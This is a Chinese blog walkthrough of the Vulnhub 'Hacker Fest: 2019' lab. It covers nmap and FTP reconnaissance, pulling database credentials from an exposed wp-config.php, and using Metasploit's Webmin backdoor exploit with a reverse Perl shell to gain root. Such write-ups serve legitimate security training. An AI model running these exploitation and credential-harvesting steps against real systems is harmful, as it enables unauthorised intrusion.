首页 > 其他分享 >Vulnhub之HF 2019靶机详细测试过程

Vulnhub之HF 2019靶机详细测试过程

时间:2023-04-22 09:46:29浏览次数:40  
标签:ftp rw -- 2019 Vulnhub wp php HF

HF 2019

作者:jason huawen

靶机信息

名称:Hacker Fest: 2019

地址:

https://www.vulnhub.com/entry/hacker-fest-2019,378/

识别目标主机IP地址

将虚拟机镜像导入到VirtualBox中,并设置网络模式为host-only,然后启动Kali Linux以及目标主机(虚拟机):

(kali㉿kali)-[~/Vulnhub/HF2019]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:69:f3:d5      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.254  08:00:27:47:72:31      1      60  PCS Systemtechnik GmbH             

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/HF2019]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-21 20:25 EDT
Nmap scan report for inplainsight (192.168.56.254)
Host is up (0.00019s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--    1 ftp      ftp           420 Nov 30  2017 index.php
| -rw-rw-r--    1 ftp      ftp         19935 Sep 05  2019 license.txt
| -rw-rw-r--    1 ftp      ftp          7447 Sep 05  2019 readme.html
| -rw-rw-r--    1 ftp      ftp          6919 Jan 12  2019 wp-activate.php
| drwxrwxr-x    9 ftp      ftp          4096 Sep 05  2019 wp-admin
| -rw-rw-r--    1 ftp      ftp           369 Nov 30  2017 wp-blog-header.php
| -rw-rw-r--    1 ftp      ftp          2283 Jan 21  2019 wp-comments-post.php
| -rw-rw-r--    1 ftp      ftp          3255 Sep 27  2019 wp-config.php
| drwxrwxr-x    8 ftp      ftp          4096 Sep 29  2019 wp-content
| -rw-rw-r--    1 ftp      ftp          3847 Jan 09  2019 wp-cron.php
| drwxrwxr-x   20 ftp      ftp         12288 Sep 05  2019 wp-includes
| -rw-rw-r--    1 ftp      ftp          2502 Jan 16  2019 wp-links-opml.php
| -rw-rw-r--    1 ftp      ftp          3306 Nov 30  2017 wp-load.php
| -rw-rw-r--    1 ftp      ftp         39551 Jun 10  2019 wp-login.php
| -rw-rw-r--    1 ftp      ftp          8403 Nov 30  2017 wp-mail.php
| -rw-rw-r--    1 ftp      ftp         18962 Mar 28  2019 wp-settings.php
| -rw-rw-r--    1 ftp      ftp         31085 Jan 16  2019 wp-signup.php
| -rw-rw-r--    1 ftp      ftp          4764 Nov 30  2017 wp-trackback.php
|_-rw-rw-r--    1 ftp      ftp          3068 Aug 17  2018 xmlrpc.php
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.56.206
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh      OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b72e8fcb12e4e8cd931e730f51ce486c (RSA)
|   256 70f444eba85554382d6d7589bbec7ee7 (ECDSA)
|_  256 7c0eabfe537e8722f85adfc9da7f9079 (ED25519)
80/tcp    open  http     Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-generator: WordPress 5.2.3
|_http-title: Tata intranet – Just another WordPress site
10000/tcp open  ssl/http MiniServ 1.890 (Webmin httpd)
| http-robots.txt: 1 disallowed entry 
|_/
| ssl-cert: Subject: commonName=*/organizationName=Webmin Webserver on Linux-Debian
| Not valid before: 2019-09-09T13:32:42
|_Not valid after:  2024-09-07T13:32:42
|_http-title: Login to Webmin
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:47:72:31 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.08 seconds

从NMAP扫描结果表明目标主机有4个开放端口:21(ftp)、22(ssh)、80(http)、10000(https)

获得Shell

首先收集一些基本信息,从FTP服务开始入手:

┌──(kali㉿kali)-[~/Vulnhub/HF2019]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 (vsFTPd 3.0.3)
Name (192.168.56.254:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||41051|)
150 Here comes the directory listing.
drwxrwxr-x    5 ftp      ftp          4096 Sep 27  2019 .
drwxrwxr-x    5 ftp      ftp          4096 Sep 27  2019 ..
-rw-rw-r--    1 ftp      ftp           420 Nov 30  2017 index.php
-rw-rw-r--    1 ftp      ftp         19935 Sep 05  2019 license.txt
-rw-rw-r--    1 ftp      ftp          7447 Sep 05  2019 readme.html
-rw-rw-r--    1 ftp      ftp          6919 Jan 12  2019 wp-activate.php
drwxrwxr-x    9 ftp      ftp          4096 Sep 05  2019 wp-admin
-rw-rw-r--    1 ftp      ftp           369 Nov 30  2017 wp-blog-header.php
-rw-rw-r--    1 ftp      ftp          2283 Jan 21  2019 wp-comments-post.php
-rw-rw-r--    1 ftp      ftp          3255 Sep 27  2019 wp-config.php
drwxrwxr-x    8 ftp      ftp          4096 Sep 29  2019 wp-content
-rw-rw-r--    1 ftp      ftp          3847 Jan 09  2019 wp-cron.php
drwxrwxr-x   20 ftp      ftp         12288 Sep 05  2019 wp-includes
-rw-rw-r--    1 ftp      ftp          2502 Jan 16  2019 wp-links-opml.php
-rw-rw-r--    1 ftp      ftp          3306 Nov 30  2017 wp-load.php
-rw-rw-r--    1 ftp      ftp         39551 Jun 10  2019 wp-login.php
-rw-rw-r--    1 ftp      ftp          8403 Nov 30  2017 wp-mail.php
-rw-rw-r--    1 ftp      ftp         18962 Mar 28  2019 wp-settings.php
-rw-rw-r--    1 ftp      ftp         31085 Jan 16  2019 wp-signup.php
-rw-rw-r--    1 ftp      ftp          4764 Nov 30  2017 wp-trackback.php
-rw-rw-r--    1 ftp      ftp          3068 Aug 17  2018 xmlrpc.php
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> get wp-config.php
local: wp-config.php remote: wp-config.php
229 Entering Extended Passive Mode (|||40504|)
150 Opening BINARY mode data connection for wp-config.php (3255 bytes).
100% |********************************************************************************|  3255        5.44 MiB/s    00:00 ETA
226 Transfer complete.
3255 bytes received in 00:00 (3.38 MiB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||47153|)
150 Here comes the directory listing.
-rw-rw-r--    1 ftp      ftp           420 Nov 30  2017 index.php
-rw-rw-r--    1 ftp      ftp         19935 Sep 05  2019 license.txt
-rw-rw-r--    1 ftp      ftp          7447 Sep 05  2019 readme.html
-rw-rw-r--    1 ftp      ftp          6919 Jan 12  2019 wp-activate.php
drwxrwxr-x    9 ftp      ftp          4096 Sep 05  2019 wp-admin
-rw-rw-r--    1 ftp      ftp           369 Nov 30  2017 wp-blog-header.php
-rw-rw-r--    1 ftp      ftp          2283 Jan 21  2019 wp-comments-post.php
-rw-rw-r--    1 ftp      ftp          3255 Sep 27  2019 wp-config.php
drwxrwxr-x    8 ftp      ftp          4096 Sep 29  2019 wp-content
-rw-rw-r--    1 ftp      ftp          3847 Jan 09  2019 wp-cron.php
drwxrwxr-x   20 ftp      ftp         12288 Sep 05  2019 wp-includes
-rw-rw-r--    1 ftp      ftp          2502 Jan 16  2019 wp-links-opml.php
-rw-rw-r--    1 ftp      ftp          3306 Nov 30  2017 wp-load.php
-rw-rw-r--    1 ftp      ftp         39551 Jun 10  2019 wp-login.php
-rw-rw-r--    1 ftp      ftp          8403 Nov 30  2017 wp-mail.php
-rw-rw-r--    1 ftp      ftp         18962 Mar 28  2019 wp-settings.php
-rw-rw-r--    1 ftp      ftp         31085 Jan 16  2019 wp-signup.php
-rw-rw-r--    1 ftp      ftp          4764 Nov 30  2017 wp-trackback.php
-rw-rw-r--    1 ftp      ftp          3068 Aug 17  2018 xmlrpc.php
226 Directory send OK.
ftp> quit
221 Goodbye.
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/HF2019]
└─$ cat wp-config.php 
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'wordpress' );

/** MySQL database password */
define( 'DB_PASSWORD', 'nvwtlRqkD0E1jBXu' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define( 'WP_HOME', 'http://' . $_SERVER['HTTP_HOST'] );
define( 'WP_SITEURL', 'http://' . $_SERVER['HTTP_HOST'] );
define( 'WP_HTTP_BLOCK_EXTERNAL', true);

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'pRK.Kp  Z1DM=j~5N.codyXo[zrg310jxWz x1}{LnIo~n2Et7-46XB:;aYFmuws' );
define( 'SECURE_AUTH_KEY',  'W#}%dnp@K[6cvP{O[:^P?IqI2I=zXhd.6|8tL>%xvY$bJPUg<)y=,)h$!su?Kta,' );
define( 'LOGGED_IN_KEY',    'gMwj,):PF(X,Ue355zuQa!E#]El]M%>K}`!eRJAPtEfB>o!cBoV#9EM,XzuB1-fy' );
define( 'NONCE_KEY',        '=!e++=KhEw8q:M;9(oi(^e:ie@]X&g#&x/bRYUU^:}n$]?`TA2IWB5}O$IV:5IVo' );
define( 'AUTH_SALT',        '%%)9qf/&oa16?5~:)hGAvLSEd{G{u)<gJ4z~A0#cqq=|Qhv1K0qPqMVI8DfA+i=L' );
define( 'SECURE_AUTH_SALT', ']FH<<oPh6f31fTb7z3s532!qGAqiSe<>bOq >vHpCxqBBj-Z&`YFRM}9N`>HwfNp' );
define( 'LOGGED_IN_SALT',   '.k0,KD{$=yHnqV6WRec1_%HUl~hI1,%ZT4$SjV]%`kN4/,(Aq#]%98-?d6q/86ID' );
define( 'NONCE_SALT',       'IVrbtg_|bteQ~1=~p[WQN+DdlL!t#/LT09?F?nX!Kuo,/zA*;%myD/m NIxhgP p' );

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}

/** Sets up WordPress vars and included files. */
require_once( ABSPATH . 'wp-settings.php' );

                                                        

针对FTP服务的信息收集,主要结果如下:

  1. 目标主机的FTP允许匿名访问

  2. FTP服务版本没有可利用的漏洞

  3. 匿名用户不能变更目录

  4. 匿名用户不允许上传文件

  5. 将FTP目录中的wp-config.php下载到本地,其中有数据库用户名和密码:

username: wordpress

password:nvwtlRqkD0E1jBXu

但是由于目标主机并没有暴露mysql服务,因此从Kali Linux上无法连接数据库。

Kali Linux上利用浏览器访问80端口,可知目标站点为wordpress站点。

┌──(kali㉿kali)-[~/Vulnhub/HF2019]
└─$ wpscan --url http://192.168.56.254 -e u,p --random-user-agent
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]

Scan Aborted: The target is responding with a 403, this might be due to a WAF. Well... --random-user-agent didn't work, use --force to skip this check if needed.
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/HF2019]
└─$ wpscan --url http://192.168.56.254 -e u,p --random-user-agent --force
_______________________________________________________________

从执行结果来看,目标站点存在防火墙,无法进行扫描。

看来80端口方向存在困难,先转向另外一个开放端口10000,可知CMS为webmin,经互联网查询存在漏洞,而且可以直接用Metasploit工具

msf6 > use exploit/linux/http/webmin_backdoor
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_backdoor) > show options 

Module options (exploit/linux/http/webmin_backdoor):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/us
                                         ing-metasploit.html
   RPORT      10000            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path to Webmin
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the loca
                                       l machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/webmin_backdoor) > set SRVHOST 192.168.56.206
SRVHOST => 192.168.56.206
msf6 exploit(linux/http/webmin_backdoor) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(linux/http/webmin_backdoor) > set LPORT 5555
LPORT => 5555
msf6 exploit(linux/http/webmin_backdoor) > set RHOSTS 192.168.56.254
RHOSTS => 192.168.56.254
msf6 exploit(linux/http/webmin_backdoor) > set SSL true 
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(linux/http/webmin_backdoor) > set RPORT 10000
RPORT => 10000
msf6 exploit(linux/http/webmin_backdoor) > run

[*] Started reverse TCP handler on 192.168.56.206:5555 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (192.168.56.206:5555 -> 192.168.56.254:55480) at 2023-04-21 20:47:44 -0400

成功得到了目标主机的shell

而且竟然直接是root shell,,轻松得到了root flag

ls /root
flag.txt
cat /root/flag.txt
3dcdf93d2976321d7a8c47a6bb2d48837d330624

标签:ftp,rw,--,2019,Vulnhub,wp,php,HF
From: https://www.cnblogs.com/jason-huawen/p/17342471.html

相关文章

  • SSHFS
    SSHFS(SSHFilesystem)是一种通过普通ssh连接来挂载和与远程服务器或工作站上的目录和文件交互的文件系统客户端。sshfs-p1822\[email protected]:/home/test/compile/slave/Project/images\/root/test/slave/\-ouid=0-ogid=0 ......
  • 微信小程序Image标签 mode=“widthFix” 问题
    微信小程序中加载图片时,如果只设定图片宽度,希望添加mode='widthFix'来自适应<Imagemode="widthFix"className={s.img]}src={ImgSource.iconLogin}/>.img{width:100%;}但是这时会出现一个问题:当页面刚打开时,会闪动一瞬间,之后才会变成自适应的高度,很影响体......
  • VulnHub-Tomato: 1
    靶机地址:https://www.vulnhub.com/entry/tomato-1,557/目标:Gettherootshelli.e.(root@localhost:~#)andthenobtainflagunder/root).一、信息收集用arp-scan探测网段内目标靶机的IP,得到目标靶机的IP为192.168.11.137arp-scan-l┌──(root㉿kali)-[~]└─#......
  • VulnHub-DC: 2
    靶机地址:https://www.vulnhub.com/entry/dc-2,311/目标:therearefiveflagsincludingthefinalflag.theonlyflagthatreallycounts,isthefinalflag.主机信息Kali:192.168.11.131DC9:192.168.11.138渗透过程1、主机探测先进行主机探测,查找靶机的IP地址a......
  • 【题解】P5327 [ZJOI2019] 语言
    P5327[ZJOI2019]语言题目描述九条可怜是一个喜欢规律的女孩子。按照规律,第二题应该是一道和数据结构有关的题。在一个遥远的国度,有\(n\)个城市。城市之间有\(n-1\)条双向道路,这些道路保证了任何两个城市之间都能直接或者间接地到达。在上古时代,这\(n\)个城市之间处......
  • FlashFXP命令行
    FlashFXP是一个非常好用的FTP工具,同时也是可以使用命令行进行操作。格式:flashfxp.exe-uploadftp://user:pass@ip:port-localpath="本地路径"-remotepath="远程FTP上的路径"上传使用FlashFXP上传文件(夹)的命令行语法:flashfxp.exe-uploadftp://user:pass@ip:port-localpa......
  • P5322 BJOI2019 排兵布阵
    P5322BJOI2019排兵布阵本题主要考察对模型的转化能力。首先要察觉两条性质:对于一个城堡,想打败一个玩家的同时用最少的士兵,肯定是正好派出这个玩家在这个城堡派出的士兵数量的二倍加一名士兵。在一个城堡上,打败了一个在这个城堡派出士兵数量为\(x\)的玩家,就可以顺便打败所......
  • vulnhub_Earth_WP
    前言靶机地址->>>vulnhub_Earth攻击机ip:192.168.20.121靶机ip:192.168.20.122参考文章https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.htmlhttps://www.cnblogs.com/wthuskyblog/p/16032277.htmlhttps://www.cnblogs.com/CHOSEN1-Z13/p/15915195.html探测靶......
  • DeepSpeed Chat: 一键式RLHF训练,让你的类ChatGPT千亿大模型提速省钱15倍
    DeepSpeedChat:一键式RLHF训练,让你的类ChatGPT千亿大模型提速省钱15倍1.概述近日来,ChatGPT及类似模型引发了人工智能(AI)领域的一场风潮。这场风潮对数字世界产生了革命性影响。ChatGPT类模型具有惊人的泛用性,能够执行归纳、编程、翻译等任务,其结果与人类专家相当甚至更优。为......
  • Vulnhub之Inclusiveness靶机详细测试过程
    Inclusiveness识别目标主机IP地址─(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts......